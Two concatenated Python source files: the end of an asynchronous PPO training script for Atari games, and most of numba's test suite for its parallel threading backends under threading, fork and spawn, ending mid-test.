env = Monitor(env, f'videos/{experiment_name}')
env = wrap_pytorch(
wrap_deepmind(
env,
clip_rewards=True,
frame_stack=True,
scale=False,
)
)
env.seed(seed)
env.action_space.seed(seed)
env.observation_space.seed(seed)
return env
return thunk
envs = DummyVecEnv([make_env(args.gym_id, args.seed+i, i) for i in range(args.num_envs)])
# if args.prod_mode:
# envs = VecPyTorch(
# SubprocVecEnv([make_env(args.gym_id, args.seed+i, i) for i in range(args.num_envs)], "fork"),
# device
# )
assert isinstance(envs.action_space, Discrete), "only discrete action space is supported"
# ALGO LOGIC: initialize agent here:
class Scale(nn.Module):
def __init__(self, scale):
super().__init__()
self.scale = scale
def forward(self, x):
return x * self.scale
def layer_init(layer, std=np.sqrt(2), bias_const=0.0):
torch.nn.init.orthogonal_(layer.weight, std)
torch.nn.init.constant_(layer.bias, bias_const)
return layer
class Agent(nn.Module):
def __init__(self, envs, frames=4):
super(Agent, self).__init__()
self.network = nn.Sequential(
Scale(1/255),
layer_init(nn.Conv2d(frames, 32, 8, stride=4)),
nn.ReLU(),
layer_init(nn.Conv2d(32, 64, 4, stride=2)),
nn.ReLU(),
layer_init(nn.Conv2d(64, 64, 3, stride=1)),
nn.ReLU(),
nn.Flatten(),
layer_init(nn.Linear(3136, 512)),
nn.ReLU()
)
self.actor = layer_init(nn.Linear(512, envs.action_space.n), std=0.01)
self.critic = layer_init(nn.Linear(512, 1), std=1)
def forward(self, x):
return self.network(x)
def get_action(self, x, action=None):
logits = self.actor(self.forward(x))
probs = Categorical(logits=logits)
if action is None:
action = probs.sample()
return action, probs.log_prob(action), probs.entropy()
def get_value(self, x):
return self.critic(self.forward(x))
agent = Agent(envs).to(device)
optimizer = optim.Adam(agent.parameters(), lr=args.learning_rate, eps=1e-5)
if args.anneal_lr:
# https://github.com/openai/baselines/blob/ea25b9e8b234e6ee1bca43083f8f3cf974143998/baselines/ppo2/defaults.py#L20
lr = lambda f: f * args.learning_rate
# ALGO Logic: Storage for epoch data
obs = share_memory(np.zeros((args.num_steps, args.num_envs) + envs.observation_space.shape, dtype=np.float32))
actions = share_memory(np.zeros((args.num_steps, args.num_envs) + envs.action_space.shape, dtype=envs.action_space.dtype))
logprobs = share_memory(np.zeros((args.num_steps, args.num_envs), dtype=np.float32))
rewards = share_memory(np.zeros((args.num_steps, args.num_envs), dtype=np.float32))
dones = share_memory(np.zeros((args.num_steps, args.num_envs), dtype=np.float32))
values = share_memory(np.zeros((args.num_steps, args.num_envs), dtype=np.float32))
# TRY NOT TO MODIFY: start the game
global_step = 0
# Note how `next_obs` and `next_done` are used; their usage is equivalent to
# https://github.com/ikostrikov/pytorch-a2c-ppo-acktr-gail/blob/84a7582477fb0d5c82ad6d850fe476829dddd2e1/a2c_ppo_acktr/storage.py#L60
next_obs = share_memory(np.zeros((args.num_envs,)+envs.observation_space.shape, dtype=np.float32))
next_done = share_memory(np.zeros(args.num_envs, dtype=np.float32))
num_updates = args.total_timesteps // args.batch_size
class AsyncEnvs:
def __init__(self, env_fns, num_rollout_workers, num_steps, device, agent,
storage):
self.envs = [env_fn() for env_fn in env_fns]
self.num_rollout_workers = num_rollout_workers
self.num_steps = num_steps
self.device = device
self.agent = agent
# ctx = mp.get_context("fork")
self.rollout_task_queues = [FastQueue(1000) for i in range(num_rollout_workers)]
self.stats_queue = FastQueue(1000)
self.policy_request_queue = FastQueue(1000)
self.storage = storage
assert len(env_fns) % self.num_rollout_workers == 0, \
"number of rollout workers must divide the number of envs"
self.num_envs_per_rollout_worker = len(env_fns) // self.num_rollout_workers
for rollout_worker_idx in range(self.num_rollout_workers):
mp.Process(target=self.start_rollout_worker, args=(rollout_worker_idx,)).start()
def start_rollout_worker(self, rollout_worker_idx):
sw = stopwatch.StopWatch()
next_obs, next_done, obs, actions, logprobs, rewards, dones, values = self.storage
env_idxs = range(rollout_worker_idx*self.num_envs_per_rollout_worker,
rollout_worker_idx*self.num_envs_per_rollout_worker+self.num_envs_per_rollout_worker)
for env_idx in env_idxs:
next_step = 0
self.policy_request_queue.put([next_step, env_idx, rollout_worker_idx])
next_obs[env_idx] = torch.tensor(self.envs[env_idx].reset())
next_done[env_idx] = 0
local_step = 0
while True:
with sw.timer('act'):
with sw.timer('wait_rollout_task_queue'):
tasks = self.rollout_task_queues[rollout_worker_idx].get_many()
with sw.timer('rollouts'):
# print(tasks)
for task in tasks:
step, env_idx = task
obs[step,env_idx] = next_obs[env_idx].copy()
dones[step,env_idx] = next_done[env_idx].copy()
next_obs[env_idx], r, d, info = self.envs[env_idx].step(actions[step,env_idx])
if d:
next_obs[env_idx] = self.envs[env_idx].reset()
rewards[step,env_idx] = r
next_done[env_idx] = d
next_step = step + 1
local_step += 1
with sw.timer('logging'):
self.policy_request_queue.put([next_step, env_idx, rollout_worker_idx])
if 'episode' in info.keys():
# print(["charts/episode_reward", info['episode']['r']])
self.stats_queue.put(['l', info['episode']['l']])
self.stats_queue.put(["charts/episode_reward", info['episode']['r']])
if local_step % 1000 == 0:
print(stopwatch.format_report(sw.get_last_aggregated_report()))
print()
env_fns = [make_env(args.gym_id, args.seed+i, i) for i in range(args.num_envs)]
async_envs = AsyncEnvs(env_fns, args.num_rollout_workers, args.num_steps, device, agent,
[next_obs, next_done, obs, actions, logprobs, rewards, dones, values])
# raise
start_time = time.time()
sw = stopwatch.StopWatch()
min_num_requests = 1
wait_for_min_requests = 0.01
# raise
for update in range(1, num_updates+1):
# Annealing the rate if instructed to do so.
if args.anneal_lr:
frac = 1.0 - (update - 1.0) / num_updates
lrnow = lr(frac)
optimizer.param_groups[0]['lr'] = lrnow
# TRY NOT TO MODIFY: prepare the execution of the game.
end_policy_requests = []
with sw.timer('main'):
with sw.timer('rollouts_inference'):
while True:
with sw.timer('stats_queue'):
try:
if async_envs.stats_queue.qsize() != 0:
ms = async_envs.stats_queue.get_many()
for m1, m2 in ms:
# m1, m2 = async_envs.stats_queue.get_many(timeout=0.005)
if m1 == 'l':
global_step += m2
else:
print(f"global_step={global_step}, episode_reward={m2}")
writer.add_scalar(m1, m2, global_step)
except:
pass
with sw.timer('get_policy_requests'):
policy_requests = []
if async_envs.policy_request_queue.qsize() != 0:
temp_policy_requests = async_envs.policy_request_queue.get_many()
for policy_request in temp_policy_requests:
next_step = policy_request[0] = policy_request[0] % args.num_steps
if next_step == 0:
end_policy_requests += [policy_request]
else:
policy_requests += [policy_request]
if len(end_policy_requests) == args.num_envs:
break
with sw.timer('get_actions'):
if len(policy_requests) > 0:
with sw.timer('index'):
ls = np.array(policy_requests)
with sw.timer('move_to_gpu_for_inference'):
next_o = torch.tensor(next_obs[ls[:,1]]).pin_memory().to(device, non_blocking=True)
with sw.timer('actual inference'):
with torch.no_grad():
a, l, _ = agent.get_action(next_o)
v = agent.get_value(next_o)
with sw.timer('to cpu and deligate rollout tasks'):
actions[tuple(ls[:,[0,1]].T)] = a.cpu()
logprobs[tuple(ls[:,[0,1]].T)] = l.cpu()
values[tuple(ls[:,[0,1]].T)] = v.flatten().cpu()
for item in ls:
async_envs.rollout_task_queues[item[2]].put([item[0], item[1]])
with sw.timer('move to gpu'):
# bootstrap reward if not done. reached the batch limit
gpu_obs = torch.tensor(obs).pin_memory().to(device, non_blocking=True)
gpu_actions = torch.tensor(actions).pin_memory().to(device, non_blocking=True)
gpu_logprobs = torch.tensor(logprobs).pin_memory().to(device, non_blocking=True)
gpu_rewards = torch.tensor(rewards).pin_memory().to(device, non_blocking=True)
gpu_dones = torch.tensor(dones).pin_memory().to(device, non_blocking=True)
gpu_values = torch.tensor(values).pin_memory().to(device, non_blocking=True)
gpu_next_obs = torch.tensor(next_obs).pin_memory().to(device, non_blocking=True)
gpu_next_done = torch.tensor(next_done).pin_memory().to(device, non_blocking=True)
with sw.timer('learn'):
with torch.no_grad():
last_value = agent.get_value(gpu_next_obs).reshape(1, -1)
if args.gae:
advantages = torch.zeros_like(gpu_rewards).to(device)
lastgaelam = 0
for t in reversed(range(args.num_steps)):
if t == args.num_steps - 1:
nextnonterminal = 1.0 - gpu_next_done
nextvalues = last_value
else:
nextnonterminal = 1.0 - gpu_dones[t+1]
nextvalues = gpu_values[t+1]
delta = gpu_rewards[t] + args.gamma * nextvalues * nextnonterminal - gpu_values[t]
advantages[t] = lastgaelam = delta + args.gamma * args.gae_lambda * nextnonterminal * lastgaelam
returns = advantages + gpu_values
else:
returns = torch.zeros_like(gpu_rewards).to(device)
for t in reversed(range(args.num_steps)):
if t == args.num_steps - 1:
nextnonterminal = 1.0 - gpu_next_done
next_return = last_value
else:
nextnonterminal = 1.0 - gpu_dones[t+1]
next_return = returns[t+1]
returns[t] = gpu_rewards[t] + args.gamma * nextnonterminal * next_return
advantages = returns - gpu_values
# flatten the batch
b_obs = gpu_obs.reshape((-1,)+envs.observation_space.shape)
b_logprobs = gpu_logprobs.reshape(-1)
b_actions = gpu_actions.reshape((-1,)+envs.action_space.shape)
b_advantages = advantages.reshape(-1)
b_returns = returns.reshape(-1)
b_values = gpu_values.reshape(-1)
# Optimizaing the policy and value network
target_agent = Agent(envs).to(device)
inds = np.arange(args.batch_size,)
for i_epoch_pi in range(args.update_epochs):
np.random.shuffle(inds)
target_agent.load_state_dict(agent.state_dict())
for start in range(0, args.batch_size, args.minibatch_size):
end = start + args.minibatch_size
minibatch_ind = inds[start:end]
mb_advantages = b_advantages[minibatch_ind]
if args.norm_adv:
mb_advantages = (mb_advantages - mb_advantages.mean()) / (mb_advantages.std() + 1e-8)
_, newlogproba, entropy = agent.get_action(b_obs[minibatch_ind], b_actions.long()[minibatch_ind])
ratio = (newlogproba - b_logprobs[minibatch_ind]).exp()
# Stats
approx_kl = (b_logprobs[minibatch_ind] - newlogproba).mean()
# Policy loss
pg_loss1 = -mb_advantages * ratio
pg_loss2 = -mb_advantages * torch.clamp(ratio, 1-args.clip_coef, 1+args.clip_coef)
pg_loss = torch.max(pg_loss1, pg_loss2).mean()
entropy_loss = entropy.mean()
# Value loss
new_values = agent.get_value(b_obs[minibatch_ind]).view(-1)
if args.clip_vloss:
v_loss_unclipped = ((new_values - b_returns[minibatch_ind]) ** 2)
v_clipped = b_values[minibatch_ind] + torch.clamp(new_values - b_values[minibatch_ind], -args.clip_coef, args.clip_coef)
v_loss_clipped = (v_clipped - b_returns[minibatch_ind])**2
v_loss_max = torch.max(v_loss_unclipped, v_loss_clipped)
v_loss = 0.5 * v_loss_max.mean()
else:
v_loss = 0.5 * ((new_values - b_returns[minibatch_ind]) ** 2).mean()
loss = pg_loss - args.ent_coef * entropy_loss + v_loss * args.vf_coef
optimizer.zero_grad()
loss.backward()
nn.utils.clip_grad_norm_(agent.parameters(), args.max_grad_norm)
optimizer.step()
if args.kle_stop:
if approx_kl > args.target_kl:
break
if args.kle_rollback:
if (b_logprobs[minibatch_ind] - agent.get_action(b_obs[minibatch_ind], b_actions.long()[minibatch_ind])[1]).mean() > args.target_kl:
agent.load_state_dict(target_agent.state_dict())
break
# TRY NOT TO MODIFY: record rewards for plotting purposes
writer.add_scalar("charts/learning_rate", optimizer.param_groups[0]['lr'], global_step)
writer.add_scalar("losses/value_loss", v_loss.item(), global_step)
writer.add_scalar("losses/policy_loss", pg_loss.item(), global_step)
writer.add_scalar("losses/entropy", entropy.mean().item(), global_step)
writer.add_scalar("losses/approx_kl", approx_kl.item(), global_step)
if args.kle_stop or args.kle_rollback:
writer.add_scalar("debug/pg_stop_iter", i_epoch_pi, global_step)
# continue
print('restart')
print("SPS:", int(global_step / (time.time() - start_time)))
# raise
ls = np.array(end_policy_requests)
next_o = torch.tensor(next_obs[ls[:,1]]).pin_memory().to(device, non_blocking=True)
with torch.no_grad():
a, l, _ = agent.get_action(next_o)
v = agent.get_value(next_o)
actions[tuple(ls[:,[0,1]].T)] = a.cpu()
logprobs[tuple(ls[:,[0,1]].T)] = l.cpu()
values[tuple(ls[:,[0,1]].T)] = v.flatten().cpu()
for item in ls:
async_envs.rollout_task_queues[item[2]].put([item[0], item[1]])
print(stopwatch.format_report(sw.get_last_aggregated_report()))
envs.close()
writer.close()
|
test_parallel_backend.py | # -*- coding: utf-8 -*-
from __future__ import print_function, absolute_import
"""
Tests the parallel backend
"""
import threading
import multiprocessing
import random
import os
import sys
import subprocess
import numpy as np
from numba import config, utils
from numba import unittest_support as unittest
from numba import jit, vectorize, guvectorize
from .support import temp_directory, override_config, TestCase, tag
from .test_parfors import skip_unsupported as parfors_skip_unsupported
from .test_parfors import linux_only
from numba.six.moves import queue as t_queue
from numba.testing.main import _TIMEOUT as _RUNNER_TIMEOUT
_TEST_TIMEOUT = _RUNNER_TIMEOUT - 60.
if utils.PYVERSION >= (3, 0):
import faulthandler
# Check which backends are available
# TODO: Put this in a subprocess so the address space is kept clean
try:
from numba.npyufunc import tbbpool # noqa: F401
_HAVE_TBB_POOL = True
except ImportError:
_HAVE_TBB_POOL = False
try:
from numba.npyufunc import omppool
_HAVE_OMP_POOL = True
except ImportError:
_HAVE_OMP_POOL = False
try:
import scipy.linalg.cython_lapack # noqa: F401
_HAVE_LAPACK = True
except ImportError:
_HAVE_LAPACK = False
# test skipping decorators
skip_no_omp = unittest.skipUnless(_HAVE_OMP_POOL, "OpenMP threadpool required")
skip_no_tbb = unittest.skipUnless(_HAVE_TBB_POOL, "TBB threadpool required")
_gnuomp = _HAVE_OMP_POOL and omppool.openmp_vendor == "GNU"
skip_unless_gnu_omp = unittest.skipUnless(_gnuomp, "GNU OpenMP only tests")
skip_unless_py3 = unittest.skipUnless(utils.PYVERSION >= (3, 0),
"Test runs on Python 3 only")
_windows = sys.platform.startswith('win')
_osx = sys.platform.startswith('darwin')
_windows_py27 = (sys.platform.startswith('win32') and
sys.version_info[:2] == (2, 7))
_32bit = sys.maxsize <= 2 ** 32
_parfors_unsupported = _32bit or _windows_py27
_HAVE_OS_FORK = not _windows
# some functions to jit
def foo(n, v):
return np.ones(n) + v
if _HAVE_LAPACK:
def linalg(n, v):
x = np.dot(np.ones((n, n)), np.ones((n, n)))
return x + np.arange(n) + v
else:
def linalg(n, v):
# no way to trigger MKL without the lapack bindings.
return np.arange(n) + v
def ufunc_foo(a, b):
return a + b
def gufunc_foo(a, b, out):
out[0] = a + b
class runnable(object):
def __init__(self, **options):
self._options = options
class jit_runner(runnable):
def __call__(self):
cfunc = jit(**self._options)(foo)
a = 4
b = 10
expected = foo(a, b)
got = cfunc(a, b)
np.testing.assert_allclose(expected, got)
class linalg_runner(runnable):
def __call__(self):
cfunc = jit(**self._options)(linalg)
a = 4
b = 10
expected = linalg(a, b)
got = cfunc(a, b)
np.testing.assert_allclose(expected, got)
class vectorize_runner(runnable):
def __call__(self):
cfunc = vectorize(['(f4, f4)'], **self._options)(ufunc_foo)
a = b = np.random.random(10).astype(np.float32)
expected = ufunc_foo(a, b)
got = cfunc(a, b)
np.testing.assert_allclose(expected, got)
class guvectorize_runner(runnable):
def __call__(self):
sig = ['(f4, f4, f4[:])']
cfunc = guvectorize(sig, '(),()->()', **self._options)(gufunc_foo)
a = b = np.random.random(10).astype(np.float32)
expected = ufunc_foo(a, b)
got = cfunc(a, b)
np.testing.assert_allclose(expected, got)
def chooser(fnlist, **kwargs):
q = kwargs.get('queue')
try:
if utils.PYVERSION >= (3, 0):
faulthandler.enable()
for _ in range(int(len(fnlist) * 1.5)):
fn = random.choice(fnlist)
fn()
except Exception as e:
q.put(e)
def compile_factory(parallel_class, queue_impl):
def run_compile(fnlist):
q = queue_impl()
kws = {'queue': q}
ths = [parallel_class(target=chooser, args=(fnlist,), kwargs=kws)
for i in range(4)]
for th in ths:
th.start()
for th in ths:
th.join()
if not q.empty():
errors = []
while not q.empty():
errors.append(q.get(False))
_msg = "Error(s) occurred in delegated runner:\n%s"
raise RuntimeError(_msg % '\n'.join([repr(x) for x in errors]))
return run_compile
# workers
_thread_class = threading.Thread
class _proc_class_impl(object):
def __init__(self, method):
self._method = method
def __call__(self, *args, **kwargs):
if utils.PYVERSION < (3, 0):
return multiprocessing.Process(*args, **kwargs)
else:
ctx = multiprocessing.get_context(self._method)
return ctx.Process(*args, **kwargs)
def _get_mp_classes(method):
if utils.PYVERSION < (3, 0):
proc = _proc_class_impl(method)
queue = multiprocessing.Queue
else:
if method == 'default':
method = None
ctx = multiprocessing.get_context(method)
proc = _proc_class_impl(method)
queue = ctx.Queue
return proc, queue
thread_impl = compile_factory(_thread_class, t_queue.Queue)
spawn_proc_impl = compile_factory(*_get_mp_classes('spawn'))
if not _windows:
fork_proc_impl = compile_factory(*_get_mp_classes('fork'))
forkserver_proc_impl = compile_factory(*_get_mp_classes('forkserver'))
# this is duplication as Py27, linux uses fork, windows uses spawn, it however
# is kept like this so that when tests fail it's less confusing!
default_proc_impl = compile_factory(*_get_mp_classes('default'))
class TestParallelBackendBase(TestCase):
"""
Base class for testing the parallel backends
"""
all_impls = [
jit_runner(nopython=True),
jit_runner(nopython=True, cache=True),
jit_runner(nopython=True, nogil=True),
linalg_runner(nopython=True),
linalg_runner(nopython=True, nogil=True),
vectorize_runner(nopython=True),
vectorize_runner(nopython=True, target='parallel'),
vectorize_runner(nopython=True, target='parallel', cache=True),
guvectorize_runner(nopython=True),
guvectorize_runner(nopython=True, target='parallel'),
guvectorize_runner(nopython=True, target='parallel', cache=True),
]
if not _parfors_unsupported:
parfor_impls = [
jit_runner(nopython=True, parallel=True),
jit_runner(nopython=True, parallel=True, cache=True),
linalg_runner(nopython=True, parallel=True),
linalg_runner(nopython=True, parallel=True, cache=True),
]
all_impls.extend(parfor_impls)
parallelism = ['threading', 'random']
if utils.PYVERSION > (3, 0):
parallelism.append('multiprocessing_spawn')
if _HAVE_OS_FORK:
parallelism.append('multiprocessing_fork')
parallelism.append('multiprocessing_forkserver')
else:
parallelism.append('multiprocessing_default')
runners = {
'concurrent_jit': [
jit_runner(nopython=True, parallel=(not _parfors_unsupported)),
],
'concurrect_vectorize': [
vectorize_runner(nopython=True, target='parallel'),
],
'concurrent_guvectorize': [
guvectorize_runner(nopython=True, target='parallel'),
],
'concurrent_mix_use': all_impls,
}
safe_backends = {'omp', 'tbb'}
def run_compile(self, fnlist, parallelism='threading'):
self._cache_dir = temp_directory(self.__class__.__name__)
with override_config('CACHE_DIR', self._cache_dir):
if parallelism == 'threading':
thread_impl(fnlist)
elif parallelism == 'multiprocessing_fork':
fork_proc_impl(fnlist)
elif parallelism == 'multiprocessing_forkserver':
forkserver_proc_impl(fnlist)
elif parallelism == 'multiprocessing_spawn':
spawn_proc_impl(fnlist)
elif parallelism == 'multiprocessing_default':
default_proc_impl(fnlist)
elif parallelism == 'random':
if utils.PYVERSION < (3, 0):
ps = [thread_impl, default_proc_impl]
else:
ps = [thread_impl, spawn_proc_impl]
if _HAVE_OS_FORK:
ps.append(fork_proc_impl)
ps.append(forkserver_proc_impl)
random.shuffle(ps)
for impl in ps:
impl(fnlist)
else:
raise ValueError(
'Unknown parallelism supplied %s' % parallelism)
_specific_backends = config.THREADING_LAYER in ('omp', 'tbb', 'workqueue')
@unittest.skipUnless(_specific_backends, "Threading layer not explicit")
class TestParallelBackend(TestParallelBackendBase):
""" These are like the numba.tests.test_threadsafety tests but designed
instead to torture the parallel backend.
If a suitable backend is supplied via NUMBA_THREADING_LAYER these tests
can be run directly. This test class cannot be run using the multiprocessing
option to the test runner (i.e. `./runtests -m`) as daemon processes cannot
have children.
"""
# NOTE: All tests are generated based on what a platform supports concurrent
# execution wise from Python, irrespective of whether the native libraries
# can actually handle the behaviour present.
@classmethod
def generate(cls):
for p in cls.parallelism:
for name, impl in cls.runners.items():
methname = "test_" + p + '_' + name
def methgen(impl, p):
def test_method(self):
selfproc = multiprocessing.current_process()
# daemonized processes cannot have children
if selfproc.daemon:
_msg = 'daemonized processes cannot have children'
self.skipTest(_msg)
else:
self.run_compile(impl, parallelism=p)
return test_method
fn = methgen(impl, p)
fn.__name__ = methname
setattr(cls, methname, fn)
TestParallelBackend.generate()
class TestSpecificBackend(TestParallelBackendBase):
"""
This is quite contrived, for each test in the TestParallelBackend tests it
generates a test that will run the TestParallelBackend test in a new python
process with an environment modified to ensure a specific threadsafe backend
is used. This is with view of testing the backends independently and in an
isolated manner such that if they hang/crash/have issues, it doesn't kill
the test suite.
"""
_DEBUG = False
backends = {'tbb': skip_no_tbb,
'omp': skip_no_omp,
'workqueue': unittest.skipIf(False, '')}
def run_cmd(self, cmdline, env):
popen = subprocess.Popen(cmdline,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env)
# finish in _TEST_TIMEOUT seconds or kill it
timeout = threading.Timer(_TEST_TIMEOUT, popen.kill)
try:
timeout.start()
out, err = popen.communicate()
if popen.returncode != 0:
raise AssertionError(
"process failed with code %s: stderr follows\n%s\n" %
(popen.returncode, err.decode()))
return out.decode(), err.decode()
finally:
timeout.cancel()
return None, None
def run_test_in_separate_process(self, test, threading_layer):
env_copy = os.environ.copy()
env_copy['NUMBA_THREADING_LAYER'] = str(threading_layer)
cmdline = [sys.executable, "-m", "numba.runtests", test]
return self.run_cmd(cmdline, env_copy)
@classmethod
def _inject(cls, p, name, backend, backend_guard):
themod = cls.__module__
thecls = TestParallelBackend.__name__
methname = "test_" + p + '_' + name
injected_method = '%s.%s.%s' % (themod, thecls, methname)
def test_template(self):
o, e = self.run_test_in_separate_process(injected_method, backend)
if self._DEBUG:
print('stdout:\n "%s"\n stderr:\n "%s"' % (o, e))
self.assertIn('OK', e)
self.assertTrue('FAIL' not in e)
self.assertTrue('ERROR' not in e)
injected_test = "test_%s_%s_%s" % (p, name, backend)
# Mark as long_running
setattr(cls, injected_test,
tag('long_running')(backend_guard(test_template)))
@classmethod
def generate(cls):
for backend, backend_guard in cls.backends.items():
for p in cls.parallelism:
for name in cls.runners.keys():
# handle known problem cases...
# GNU OpenMP is not fork safe
if (p in ('multiprocessing_fork', 'random') and
backend == 'omp' and
sys.platform.startswith('linux')):
continue
# workqueue is not thread safe
if (p in ('threading', 'random') and
backend == 'workqueue'):
continue
cls._inject(p, name, backend, backend_guard)
TestSpecificBackend.generate()
class ThreadLayerTestHelper(TestCase):
"""
Helper class for running an isolated piece of code based on a template
"""
# sys path injection and separate usecase module to make sure everything
# is importable by children of multiprocessing
_here = "%r" % os.path.dirname(__file__)
template = """if 1:
import sys
sys.path.insert(0, "%(here)r")
import multiprocessing
import numpy as np
from numba import njit
import numba
try:
import threading_backend_usecases
except ImportError as e:
print("DEBUG:", sys.path)
raise e
import os
sigterm_handler = threading_backend_usecases.sigterm_handler
busy_func = threading_backend_usecases.busy_func
def the_test():
%%s
if __name__ == "__main__":
the_test()
""" % {'here': _here}
def run_cmd(self, cmdline, env=None):
if env is None:
env = os.environ.copy()
env['NUMBA_THREADING_LAYER'] = str("omp")
popen = subprocess.Popen(cmdline,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env)
# finish in _TEST_TIMEOUT seconds or kill it
timeout = threading.Timer(_TEST_TIMEOUT, popen.kill)
try:
timeout.start()
out, err = popen.communicate()
if popen.returncode != 0:
raise AssertionError(
"process failed with code %s: stderr follows\n%s\n" %
(popen.returncode, err.decode()))
finally:
timeout.cancel()
return out.decode(), err.decode()
@parfors_skip_unsupported
class TestThreadingLayerSelection(ThreadLayerTestHelper):
"""
Checks that numba.threading_layer() reports correctly.
"""
_DEBUG = False
backends = {'tbb': skip_no_tbb,
'omp': skip_no_omp,
'workqueue': unittest.skipIf(False, '')}
@classmethod
def _inject(cls, backend, backend_guard):
def test_template(self):
body = """if 1:
X = np.arange(1000000.)
Y = np.arange(1000000.)
Z = busy_func(X, Y)
assert numba.threading_layer() == '%s'
"""
runme = self.template % (body % backend)
cmdline = [sys.executable, '-c', runme]
env = os.environ.copy()
env['NUMBA_THREADING_LAYER'] = str(backend)
out, err = self.run_cmd(cmdline, env=env)
if self._DEBUG:
print(out, err)
injected_test = "test_threading_layer_selector_%s" % backend
setattr(cls, injected_test,
tag("important")(backend_guard(test_template)))
@classmethod
def generate(cls):
for backend, backend_guard in cls.backends.items():
cls._inject(backend, backend_guard)
TestThreadingLayerSelection.generate()
@parfors_skip_unsupported
@skip_unless_py3
class TestMiscBackendIssues(ThreadLayerTestHelper):
"""
Checks fixes for the issues with threading backends implementation
"""
_DEBUG = False
@skip_no_omp
def test_omp_stack_overflow(self):
"""
Tests that OMP does not overflow stack
"""
runme = """if 1:
from numba import vectorize, threading_layer
import numpy as np
@vectorize(['f4(f4,f4,f4,f4,f4,f4,f4,f4)'], target='parallel')
def foo(a, b, c, d, e, f, g, h):
return a+b+c+d+e+f+g+h
x = np.ones(2**20, np.float32)
foo(*([x]*8))
print("@%s@" % threading_layer())
"""
cmdline = [sys.executable, '-c', runme]
env = os.environ.copy()
env['NUMBA_THREADING_LAYER'] = "omp"
env['OMP_STACKSIZE'] = "100K"
out, err = self.run_cmd(cmdline, env=env)
if self._DEBUG:
print(out, err)
self.assertIn("@omp@", out)
@skip_no_tbb
def test_single_thread_tbb(self):
"""
Tests that TBB works well with single thread
https://github.com/numba/numba/issues/3440
"""
runme = """if 1:
from numba import njit, prange, threading_layer
@njit(parallel=True)
def foo(n):
acc = 0
for i in prange(n):
acc += i
return acc
foo(100)
print("@%s@" % threading_layer())
"""
cmdline = [sys.executable, '-c', runme]
env = os.environ.copy()
env['NUMBA_THREADING_LAYER'] = "tbb"
env['NUMBA_NUM_THREADS'] = "1"
out, err = self.run_cmd(cmdline, env=env)
if self._DEBUG:
print(out, err)
self.assertIn("@tbb@", out)
# 32bit or windows py27 (not that this runs on windows)
@parfors_skip_unsupported
@skip_unless_gnu_omp
class TestForkSafetyIssues(ThreadLayerTestHelper):
"""
Checks Numba's behaviour in various situations involving GNU OpenMP and fork
"""
_DEBUG = False
def test_check_threading_layer_is_gnu(self):
runme = """if 1:
from numba.npyufunc import omppool
assert omppool.openmp_vendor == 'GNU'
"""
cmdline = [sys.executable, '-c', runme]
out, err = self.run_cmd(cmdline)
def test_par_parent_os_fork_par_child(self):
"""
Whilst normally valid, this actually isn't for Numba invariant of OpenMP
Checks SIGABRT is received.
"""
body = """if 1:
X = np.arange(1000000.)
Y = np.arange(1000000.)
Z = busy_func(X, Y)
pid = os.fork()
if pid == 0:
Z = busy_func(X, Y)
else:
os.wait()
"""
runme = self.template % body
cmdline = [sys.executable, '-c', runme]
try:
out, err = self.run_cmd(cmdline)
except AssertionError as e:
self.assertIn("failed with code -6", str(e))
def test_par_parent_implicit_mp_fork_par_child(self):
"""
Implicit use of multiprocessing fork context.
Does this:
1. Start with OpenMP
2. Fork to processes using OpenMP (this is invalid)
3. Joins fork
4. Check the exception pushed onto the queue that is a result of
catching SIGTERM coming from the C++ aborting on illegal fork
pattern for GNU OpenMP
"""
body = """if 1:
X = np.arange(1000000.)
Y = np.arange(1000000.)
q = multiprocessing.Queue()
# Start OpenMP runtime on parent via parallel function
Z = busy_func(X, Y, q)
# fork() underneath with no exec, will abort
proc = multiprocessing.Process(target = busy_func, args=(X, Y, q))
proc.start()
err = q.get()
assert "Caught SIGTERM" in str(err)
"""
runme = self.template % body
cmdline = [sys.executable, '-c', runme]
out, err = self.run_cmd(cmdline)
if self._DEBUG:
print(out, err)
@linux_only
@skip_unless_py3
def test_par_parent_explicit_mp_fork_par_child(self):
"""
Explicit use of multiprocessing fork context.
Does this:
1. Start with OpenMP
2. Fork to processes using OpenMP (this is invalid)
3. Joins fork
4. Check the exception pushed onto the queue that is a result of
catching SIGTERM coming from the C++ aborting on illegal fork
pattern for GNU OpenMP
"""
body = """if 1:
X = np.arange(1000000.)
Y = np.arange(1000000.)
q = multiprocessing.Queue()
# Start OpenMP runtime on parent via parallel function
Z = busy_func(X, Y, q)
# fork() underneath with no exec, will abort
ctx = multiprocessing.get_context('fork')
proc = ctx.Process(target = busy_func, args=(X, Y, q))
proc.start()
proc.join()
err = q.get()
assert "Caught SIGTERM" in str(err)
"""
runme = self.template % body
cmdline = [sys.executable, '-c', runme]
out, err = self.run_cmd(cmdline)
if self._DEBUG:
print(out, err)
@skip_unless_py3
def test_par_parent_mp_spawn_par_child_par_parent(self):
"""
Explicit use of multiprocessing spawn, this is safe.
Does this:
1. Start with OpenMP
2. Spawn to processes using OpenMP
3. Join spawns
4. Run some more OpenMP
"""
body = """if 1:
X = np.arange(1000000.)
Y = np.arange(1000000.)
q = multiprocessing.Queue()
# Start OpenMP runtime and run on parent via parallel function
Z = busy_func(X, Y, q)
procs = []
ctx = multiprocessing.get_context('spawn')
for x in range(20): # start a lot to try and get overlap
## fork() + exec() to run some OpenMP on children
proc = ctx.Process(target = busy_func, args=(X, Y, q))
procs.append(proc)
sys.stdout.flush()
sys.stderr.flush()
proc.start()
[p.join() for p in procs]
try:
q.get(False)
except multiprocessing.queues.Empty:
pass
else:
raise RuntimeError("Queue was not empty")
# Run some more OpenMP on parent
Z = busy_func(X, Y, q)
"""
runme = self.template % body
cmdline = [sys.executable, '-c', runme]
out, err = self.run_cmd(cmdline)
if self._DEBUG:
print(out, err)
def test_serial_parent_implicit_mp_fork_par_child_then_par_parent(self):
"""
Implicit use of multiprocessing (will be fork, but cannot declare that
in Py2.7 as there's no process launch context).
Does this:
1. Start with no OpenMP
2. Fork to processes using OpenMP
3. Join forks
4. Run some OpenMP
"""
body = """if 1:
X = np.arange(1000000.)
Y = np.arange(1000000.)
q = multiprocessing.Queue()
# this is ok
procs = []
for x in range(10):
# fork() underneath with but no OpenMP in parent, this is ok
proc = multiprocessing.Process(target = busy_func,
args=(X, Y, q))
procs.append(proc)
proc.start()
[p.join() for p in procs]
# and this is still ok as the OpenMP happened in forks
Z = busy_func(X, Y, q)
try:
q.get(False)
except multiprocessing.queues.Empty:
pass
else:
raise RuntimeError("Queue was not empty")
"""
runme = self.template % body
